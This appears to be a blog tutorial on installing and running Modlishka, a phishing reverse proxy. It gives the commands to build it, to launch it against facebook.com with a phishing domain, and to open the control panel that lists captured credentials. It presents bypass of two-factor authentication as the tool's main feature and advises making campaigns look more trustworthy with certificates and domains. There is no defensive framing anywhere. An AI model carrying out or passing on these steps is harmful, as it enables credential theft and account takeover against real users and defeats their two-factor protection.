Modlishka is a go based phishing proxy that takes your phishing campaigns to the next level. The main feature that makes it different from the other phishing tools, is that it supports 2FA authentication. It is easy to configure with great flexibility that allows the attacker to control all the traffic from a target’s browser.
Installing Modlishka
To install Modlishka, download the repo from github with ‘go get’ as shown below.
go get -u github.com/drk1wi/Modlishka
After that go inside the ‘go’ folder and run the make file depending on your OS.
cd $GOPATH/go/src/github.com/drk1wi/Modlishka/
make
That’s it.
Running Modlishka
To run the proxy go to the ‘dist’ folder and run the script.
cd dist/ ./proxy -h
We see many different options. You can create your own SSL certification using ‘openssl‘ to make the phishing campaign more trustworthy. Also, consider registering a domain name. There are also options to bypass some security measures such as anti-SSRF. In our example we will keep it simple and run it against a facebook domain.
Simply run the command below against a site target to see the proxy in action. The phisingDomain option needs to be changed to suit your needs. If you want to use the ‘loopback.modlishka.io‘ as shown below you have to change the ‘index.html‘ file inside your apache folder(/var/www/) to fit the template you need.
./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80
After that you need to go in the control panel to see all the credentials you got. Type this in your browser.
http://loopback.modlishka.io/SayHello2Modlishka/
